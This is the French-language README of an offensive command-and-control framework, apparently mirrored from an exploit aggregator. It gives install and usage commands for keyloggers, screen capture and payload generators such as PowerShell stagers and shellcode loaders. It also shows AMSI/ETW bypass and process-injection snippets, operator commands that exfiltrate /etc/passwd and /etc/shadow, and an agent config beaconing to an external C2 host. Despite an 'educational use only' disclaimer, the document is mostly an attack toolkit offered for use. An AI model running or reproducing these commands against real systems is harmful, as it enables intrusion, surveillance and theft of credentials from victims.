Share
## https://sploitus.com/exploit?id=98C2A6FB-0068-506D-B087-1DF2483D7FF8
# ShadowForge
> *"Trust no one. Suspect everyone..."*
**ShadowForge** est un framework C2 (Command & Control) red team avancΓ©. Un toolkit complet pour la post-exploitation, la dΓ©fense evasion, et les opΓ©rations offensives en sΓ©curitΓ©.
β οΈ Avertissementβ¨ FonctionnalitΓ©sπ¦ Installationπ Utilisationπ¦ Modulesπ€ Contribuer
---
## β οΈ Avertissement - Important
> **AVERTISSEMENT LΓGAL**
>
> ShadowForge est un outil Γ **usage Γ©ducatif uniquement**.
>
> - β
Utilisez-le sur **votre propre infrastructure**
> - β
Utilisez-le dans un **environnement de laboratoire isolΓ©**
> - β
Avec **autorisation explicite** du propriétaire du système
> - β **Toute utilisation malveillante ou non autorisΓ©e est interdite**
>
> **L'auteur ne peut Γͺtre tenu responsable de toute utilisation abusive.**
> Respectez les lois de votre juridiction.
---
## β¨ FonctionnalitΓ©s
| Feature | Description |
|---------|-------------|
| π₯οΈ **C2 Server** | Serveur C2 async avec gestion d'agents |
| π€ **Agent Cross-Platform** | Support Windows, Linux, macOS |
| π‘οΈ **Defense Evasion** | AMSI/ETW bypass, syscalls directs |
| π **Process Injection** | Classic, APC, process hollowing |
| π **Encryption** | AES-256-GCM, XOR, certificate pinning |
| π‘ **C2 Protocols** | HTTP, HTTPS, DNS tunneling |
| π **Payload Generator** | Python droppers, PS1 stagers, shellcode loaders |
| π¦ **Post-Exploitation** | Screenshot, keylogger, port scanner, exfiltration |
### Techniques d'Evasion
```
β AMSI Bypass (patch + unhook)
β ETW Bypass (NtTraceEvent patching)
β Direct Syscalls (bypass API hooks)
β RWX Memory Obfuscation
β Parent PID Spoofing
β Userland Hooks Bypass
β Network Tunneling (HTTP/DNS)
β Sleep Obfuscation + Jitter
```
---
## π¦ Installation
```bash
# Cloner le repo
git clone https://github.com/s1d9e/shadowforge.git
cd shadowforge
# Installer les dΓ©pendances
pip install -r requirements.txt
# Ou utiliser le script d'installation
chmod +x install.sh
./install.sh
# Lancer le serveur C2
python server/c2_server.py
```
### DΓ©pendances
```
pycryptodome>=3.18.0 # AES encryption
paramiko>=3.0.0 # SSH functionality
pyautogui>=0.9.54 # Cross-platform screenshots
pillow>=10.0.0 # Image processing
pywin32>=306 # Windows API (Windows only)
```
---
## π Utilisation
### Serveur C2
```bash
# Mode basique
python server/c2_server.py
# Avec options
python server/c2_server.py --host 0.0.0.0 --port 8443 --db shadowforge.db
```
### Shell Interactif
```bash
shadowforge> help
shadowforge> list # Liste des agents connectΓ©s
shadowforge> interact # Interagir avec un agent
shadowforge> exec whoami # ExΓ©cuter commande
shadowforge> screenshot # Capturer l'Γ©cran
shadowforge> keylogger 60 # Keylogger (60 sec)
shadowforge> portscan 192.168.1.1 # Scanner ports
shadowforge> exfiltrate /etc/passwd # Voler un fichier
shadowforge> kill # Tuer l'agent
shadowforge> exit # Quitter
```
### GΓ©nΓ©ration de Payloads
```bash
# Python dropper
python exploits/payload_gen.py --mode dropper \
--input agent/agent.py \
--output output/implant.py
# PowerShell stager (Meterpreter-compatible)
python exploits/payload_gen.py --mode stager \
--lhost 10.0.0.1 \
--lport 8443 \
--format ps1
# Shellcode loader
python exploits/payload_gen.py --mode loader \
--shellcode shellcode.bin \
--output output/loader.exe
```
### Mode CLI
```bash
# GΓ©nΓ©rer un payload
python shadowforge.py gen --mode stager --lhost 10.0.0.1 --lport 8443
# DΓ©marrer un listener
python shadowforge.py listen --port 4444
# Utilitaires
python shadowforge.py utils hash "password"
python shadowforge.py utils b64 "secret" --encode
```
---
## π¦ Modules
### Modules Agent
| Module | Description | Usage |
|--------|-------------|-------|
| `screenshot` | Capture du bureau | `screenshot` |
| `keylogger` | Enregistrement des frappes | `keylogger 60` |
| `portscanner` | Scan TCP avec dΓ©tection de services | `portscan 192.168.1.1` |
| `shell` | ExΓ©cution de commandes | `shell whoami` |
| `exfiltrate` | TΓ©lΓ©chargement de fichiers | `exfiltrate /etc/shadow` |
| `process` | ContrΓ΄le de processus | `process list/kill/inject` |
### Module Evasion
```python
from agent.evasion import AMSIBypass, ProcessInjection, SyscallWrapper
# Patch AMSI
AMSI.patch_amsi_init()
# Injection classique
ProcessInjection.classic_injection(pid, shellcode)
# Syscalls directs
syscall = SyscallWrapper()
addr = syscall.nt_allocate_virtual_memory(pid, size)
```
---
## ποΈ Architecture
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β SHADOWFORGE FRAMEWORK β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β ββββββββββββββββ ββββββββββββββββββββ β
β β OPERATOR βββββββββΊβ C2 SERVER β β
β β (YOU) β tasks β (c2_server.py) β β
β ββββββββββββββββ result ββββββββββ¬ββββββββββ β
β β β
β βββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββ
β β β ββ
β ββββββββΌβββββββ βββββββββΌββββββββ βββββββββΌββββββββ
β β HTTP/HTTPS β β LISTENER β β SMB β
β β BEACON β β MANAGER β β HANDLER β
β βββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β AGENT IMPLANT β
β β β
β β βββββββββββ βββββββββββββ ββββββββββββββ ββββββββββββββββ β
β β βScreenshotβ β Keylogger β β PortScannerβ β Exfiltrate β β
β β βββββββββββ βββββββββββββ ββββββββββββββ ββββββββββββββββ β
β β βββββββββββ βββββββββββββ ββββββββββββββ ββββββββββββββββ β
β β β Shell β β Process β β Persistenceβ β Evasion β β
β β βββββββββββ βββββββββββββ ββββββββββββββ ββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β TARGET MACHINE
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## π Configuration
### Agent (`config/settings.py`)
```python
AGENT_CONFIG = {
"c2_server": "https://c2.shadowforge.io",
"c2_port": 8443,
"poll_interval": 5,
"jitter_range": [0, 30],
"kill_date": None,
"persistence_method": "registry",
"encryption_enabled": True,
}
```
### Server
```python
C2_CONFIG = {
"bind_host": "0.0.0.0",
"bind_port": 8443,
"database": "shadowforge.db",
"max_agents": 1000,
"task_timeout": 300,
}
```
---
## ποΈ Structure
```
shadowforge/
βββ agent/
β βββ agent.py # Implant principal (~710 lignes)
β βββ evasion.py # Techniques d'evasion (~460 lignes)
β βββ utils.py # Utilitaires (~280 lignes)
βββ server/
β βββ c2_server.py # Serveur C2 (~650 lignes)
β βββ listener.py # Gestionnaire de listeners (~300 lignes)
βββ exploits/
β βββ payload_gen.py # GΓ©nΓ©rateur de payloads (~310 lignes)
β βββ exploits.py # Outils d'exploitation (~390 lignes)
βββ config/
β βββ settings.py # Configuration
βββ docs/
β βββ techniques.md # Documentation techniques
β βββ QUICKSTART.md # Guide rapide
βββ shadowforge.py # CLI unifiΓ©e (~160 lignes)
βββ setup.py # Setuptools
βββ requirements.txt # DΓ©pendances
βββ README.md
βββ LICENSE
βββ CHANGELOG.md
βββ CONTRIBUTING.md
βββ SECURITY.md
```
---
## π€ Contribuer
Les contributions sont les bienvenues !
1. **Fork** le projet
2. CrΓ©ez une branche (`git checkout -b feature/AmazingFeature`)
3. Commit (`git commit -m 'Add AmazingFeature'`)
4. Push (`git push origin feature/AmazingFeature`)
5. Ouvrez une **Pull Request**
---
## π Licence
MIT License - Voir [LICENSE](LICENSE)
---
## π Remerciements
- Framework inspirΓ© des techniques C2 modernes
- DΓ©veloppΓ© pour la communautΓ© cybersΓ©curitΓ© franΓ§aise π«π·
- Outil de recherche en sΓ©curitΓ© offensive
---
Made with π‘οΈ by s1d9e | ShadowForge C2 Framework - For Educational Purposes Only